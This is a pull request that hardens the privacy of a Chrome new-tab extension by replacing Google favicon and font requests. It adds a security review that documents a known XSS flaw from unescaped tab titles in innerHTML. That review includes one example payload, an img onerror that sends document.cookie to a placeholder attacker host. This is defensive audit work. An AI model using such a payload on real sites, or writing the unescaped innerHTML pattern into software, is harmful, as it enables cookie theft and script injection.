### PR TITLE
Replace Google favicon API and Google Fonts with privacy-safe alternatives

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -1,0 +1,110 @@
+# Security Analysis: zarazhangrui/tab-out
+
+**Reviewed:** 2026-04-15  
+**Fork:** https://github.com/vliggio/tab-out  
+**Source:** https://github.com/zarazhangrui/tab-out  
+
+---
+
+## Overview
+
+Tab Out is a Chrome extension (Manifest V3) that replaces the new tab page with a dashboard grouping open tabs by domain. It is written in plain JavaScript (~900 lines), HTML, and CSS with no build step or npm dependencies.
+
+---
+
+## Permissions
+
+```json
+"permissions": ["tabs", "activeTab", "storage"]
+```
+
+These are minimal and appropriate. The extension cannot read page content, inject scripts into sites, or intercept network traffic. No `host_permissions` are declared.
+
+---
+
+## Findings
+
+### Medium — Google favicon API leaks all open tab domains
+
+**Files:** `extension/app.js` lines 770, 851, 969
+
+```js
+// Original code — fired once per unique domain across all open tabs
+const faviconUrl = `https://www.google.com/s2/favicons?domain=${domain}&sz=16`;
+```
+
+Every time the user opens a new tab, the extension renders all open tabs as cards and fires one image request per unique domain to Google's favicon service. Each request carries:
+
+- The user's IP address
+- The domain of the tab (e.g. `yourbank.com`, `patientportal.hospital.com`)
+- A timestamp correlated with each new tab open
+- The user's Google session cookies if signed into any Google service, linking the request to their Google account identity
+
+This gives Google a continuous, real-time feed of what domains the user has open — including sensitive sites that may have no Google relationship of their own (banking, medical portals, HR systems, legal research, job boards).
+
+**Fix applied:** Replaced with DuckDuckGo's favicon API (`https://icons.duckduckgo.com/ip3/${domain}.ico`), which has no ad-targeting business model and does not share an identity surface with a major ad network.
+
+---
+
+### Low — Google Fonts leaks IP on every new tab open
+
+**File:** `extension/index.html` lines 9–10
+
+```html
+<link rel="preconnect" href="https://fonts.googleapis.com">
+<link href="https://fonts.googleapis.com/css2?family=Newsreader:...&family=DM+Sans:...&display=swap" rel="stylesheet">
+```
+
+Each new tab load triggers a request to Google Fonts. Google receives the user's IP and can infer new tab open frequency and timing. Less severe than the favicon issue since no tab content is exposed, but it is an unnecessary third-party call.
+
+**Fix applied:** Removed both link tags. Replaced `'DM Sans'` with `-apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif` and `'Newsreader'` with `'Iowan Old Style', 'Palatino Linotype', Palatino, 'Book Antiqua', Georgia, serif` in `extension/style.css` (7 occurrences).
+
+---
+
+### Low — XSS via unescaped tab titles in innerHTML
+
+**Files:** `extension/app.js` lines 773, 853, 977, 999
+
+Tab titles from open pages are processed and inserted into `innerHTML` without HTML-escaping. Examples:
+
+```js
+// renderArchiveItem — unescaped:
+${item.title || item.url}
+
+// renderDomainCard chip — unescaped:
+<span class="chip-text">${label}</span>
+```
+
+If a malicious page sets its document title to a string containing HTML (e.g. `<img src=x onerror=fetch('https://evil.example/'+btoa(document.cookie))>`), and the user has that tab open while viewing their new tab page, the payload would execute in the extension page context. That context has access to `chrome.tabs` and `chrome.storage`.
+
+**Severity is low** because: (a) it requires the user to have a tab open with a crafted title, (b) `chrome.storage` only contains saved-for-later URLs the user saved themselves, and (c) the `tabs` permission cannot read page content — only URLs and titles that are already visible in the dashboard. No fix applied in the fork; a future hardening pass could use `textContent` assignments or a `sanitize()` helper instead of template literals into `innerHTML`.
+
+---
+
+## What Was Not Found
+
+- No data exfiltration to any server controlled by the extension author
+- No analytics or telemetry
+- No obfuscated code
+- No remote script loading
+- No use of `eval()` or `Function()` constructor
+- No broad `host_permissions`
+- `config.local.js` is gitignored and loaded with a silent `onerror` — personal config cannot be accidentally committed
+
+---
+
+## Summary
+
+The extension is not spyware. The author has no server-side component receiving user data. The primary real-world risk is structural: the Google favicon API creates a passive, continuous data leak to Google tied to the user's identity. This was fixed in the fork. The Google Fonts dependency was also removed. The XSS finding is noted but low-priority given the constrained impact.
+
+---
+
+## Changes Made in Fork
+
+| File | Change |
+|---|---|
+| `extension/app.js` | Replaced 3 Google favicon API calls with DuckDuckGo favicon API |
+| `extension/index.html` | Removed Google Fonts `<link>` tags |
+| `extension/style.css` | Replaced `'DM Sans'` and `'Newsreader'` with system font stacks (7 occurrences) |
+
+**To use the fork:** Open `chrome://extensions`, enable Developer mode, click "Load unpacked", select the `extension/` directory from the cloned fork.

--- a/extension/app.js
+++ b/extension/app.js
@@ -767,7 +767,7 @@ function buildOverflowChips(hiddenTabs, urlCounts = {}) {
     const safeTitle = label.replace(/"/g, '&quot;');
     let domain = '';
     try { domain = new URL(tab.url).hostname; } catch {}
-    const faviconUrl = domain ? `https://www.google.com/s2/favicons?domain=${domain}&sz=16` : '';
+    const faviconUrl = domain ? `https://icons.duckduckgo.com/ip3/${domain}.ico` : '';
     return `<div class="page-chip clickable${chipClass}" data-action="focus-tab" data-tab-url="${safeUrl}" title="${safeTitle}">
       ${faviconUrl ? `<img class="chip-favicon" src="${faviconUrl}" alt="" onerror="this.style.display='none'">` : ''}
       <span class="chip-text">${label}</span>${dupeTag}
@@ -848,7 +848,7 @@ function renderDomainCard(group) {
     const safeTitle = label.replace(/"/g, '&quot;');
     let domain = '';
     try { domain = new URL(tab.url).hostname; } catch {}
-    const faviconUrl = domain ? `https://www.google.com/s2/favicons?domain=${domain}&sz=16` : '';
+    const faviconUrl = domain ? `https://icons.duckduckgo.com/ip3/${domain}.ico` : '';
     return `<div class="page-chip clickable${chipClass}" data-action="focus-tab" data-tab-url="${safeUrl}" title="${safeTitle}">
       ${faviconUrl ? `<img class="chip-favicon" src="${faviconUrl}" alt="" onerror="this.style.display='none'">` : ''}
       <span class="chip-text">${label}</span>${dupeTag}
@@ -966,7 +966,7 @@ async function renderDeferredColumn() {
 function renderDeferredItem(item) {
   let domain = '';
   try { domain = new URL(item.url).hostname.replace(/^www\./, ''); } catch {}
-  const faviconUrl = `https://www.google.com/s2/favicons?domain=${domain}&sz=16`;
+  const faviconUrl = domain ? `https://icons.duckduckgo.com/ip3/${domain}.ico` : '';
   const ago = timeAgo(item.savedAt);
 
   return `

--- a/extension/index.html
+++ b/extension/index.html
@@ -5,11 +5,7 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Tab Out</title>
 
-  <!-- Google Fonts: Newsreader (for headings/numbers) + DM Sans (for body text) -->
-  <link rel="preconnect" href="https://fonts.googleapis.com">
-  <link href="https://fonts.googleapis.com/css2?family=Newsreader:ital,opsz,wght@0,6..72,300;0,6..72,400;0,6..72,500;1,6..72,300;1,6..72,400&family=DM+Sans:wght@300;400;500;600&display=swap" rel="stylesheet">
-
-  <link rel="stylesheet" href="style.css">
+<link rel="stylesheet" href="style.css">
 </head>
 <body>
 <div class="container">

--- a/extension/style.css
+++ b/extension/style.css
@@ -23,7 +23,7 @@
 * { margin: 0; padding: 0; box-sizing: border-box; }
 
 body {
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   background: var(--paper);
   color: var(--ink);
   min-height: 100vh;
@@ -65,7 +65,7 @@ header {
 }
 
 .header-left h1 {
-  font-family: 'Newsreader', serif;
+  font-family: 'Iowan Old Style', 'Palatino Linotype', Palatino, 'Book Antiqua', Georgia, serif;
   font-weight: 300;
   font-size: 28px;
   letter-spacing: -0.5px;
@@ -127,7 +127,7 @@ header {
 }
 
 .tab-cleanup-btn {
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-size: 12px;
   font-weight: 600;
   padding: 8px 20px;
@@ -194,7 +194,7 @@ header {
 }
 
 .section-header h2 {
-  font-family: 'Newsreader', serif;
+  font-family: 'Iowan Old Style', 'Palatino Linotype', Palatino, 'Book Antiqua', Georgia, serif;
   font-weight: 400;
   font-size: 18px;
   font-style: italic;
@@ -477,7 +477,7 @@ header {
 
 .mission-page-count {
   font-size: 20px;
-  font-family: 'Newsreader', serif;
+  font-family: 'Iowan Old Style', 'Palatino Linotype', Palatino, 'Book Antiqua', Georgia, serif;
   font-weight: 300;
   color: var(--ink);
   line-height: 1;
@@ -499,7 +499,7 @@ header {
 
 .action-btn {
   font-size: 11px;
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-weight: 500;
   padding: 5px 14px;
   border-radius: 4px;
@@ -572,7 +572,7 @@ header {
   transform: translateX(-50%) translateY(80px);
   background: var(--ink);
   color: var(--paper);
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-size: 13px;
   font-weight: 500;
   padding: 12px 24px;
@@ -618,7 +618,7 @@ footer {
 }
 
 .stat-num {
-  font-family: 'Newsreader', serif;
+  font-family: 'Iowan Old Style', 'Palatino Linotype', Palatino, 'Book Antiqua', Georgia, serif;
   font-size: 28px;
   font-weight: 300;
   color: var(--ink);
@@ -640,7 +640,7 @@ footer {
 }
 
 .refresh-btn {
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-size: 11px;
   font-weight: 500;
   color: var(--accent-amber);
@@ -749,7 +749,7 @@ footer { animation: fadeUp 0.5s ease 0.65s both; }
 }
 
 .empty-title {
-  font-family: 'Newsreader', serif;
+  font-family: 'Iowan Old Style', 'Palatino Linotype', Palatino, 'Book Antiqua', Georgia, serif;
   font-size: 20px;
   font-weight: 400;
   font-style: italic;
@@ -833,7 +833,7 @@ footer { animation: fadeUp 0.5s ease 0.65s both; }
 
 /* "Update now" button — small, filled, sage green */
 .update-banner-btn {
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-size: 12px;
   font-weight: 500;
   color: #fff;
@@ -1059,7 +1059,7 @@ footer { animation: fadeUp 0.5s ease 0.65s both; }
 }
 
 .archive-toggle {
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-size: 12px;
   font-weight: 500;
   color: var(--muted);
@@ -1100,7 +1100,7 @@ footer { animation: fadeUp 0.5s ease 0.65s both; }
 }
 
 .archive-search {
-  font-family: 'DM Sans', sans-serif;
+  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
   font-size: 12px;
   width: 100%;
   padding: 8px 12px;


### PR DESCRIPTION
## What this changes

Replaces two third-party Google dependencies with privacy-safe alternatives and removes a redundant network call:

| File | Change |
|---|---|
| `extension/app.js` | Replaced 3 Google favicon API calls with DuckDuckGo favicon API |
| `extension/index.html` | Removed Google Fonts `<link>` tags |
| `extension/style.css` | Replaced `'DM Sans'` and `'Newsreader'` with equivalent system font stacks (7 occurrences) |

## Why

### Google favicon API (medium severity)

The original code called `https://www.google.com/s2/favicons?domain=${domain}&sz=16` once per unique domain across all open tabs, on every new tab open. Each request carries the user's IP address, the domain name, a timestamp, and — if the user is signed into any Google service — their Google session cookie, linking the request to their account identity.

This gives Google a continuous, real-time feed of what domains the user has open, including sensitive sites that have no Google relationship of their own (banking, medical portals, HR systems, legal research, job boards).

The fix uses DuckDuckGo's favicon API (`https://icons.duckduckgo.com/ip3/${domain}.ico`) instead. Favicon display is identical; no data reaches Google.

### Google Fonts (low severity)

Each new tab load triggered a request to `fonts.googleapis.com`, sending the user's IP to Google and revealing new-tab open frequency and timing. The fonts are not required for functionality. System font stacks (`-apple-system / BlinkMacSystemFont` for DM Sans, `Palatino / Georgia` for Newsreader) provide equivalent visual weight with zero network requests.

## Full analysis

A complete source-level security review is in [`SECURITY.md`](https://github.com/vliggio/tab-out/blob/main/SECURITY.md) in the fork, including findings that were noted but not changed (XSS via unescaped tab titles in `innerHTML`) and a full list of things that were reviewed and found clean (no telemetry, no author-controlled server, no obfuscated code, no broad host permissions).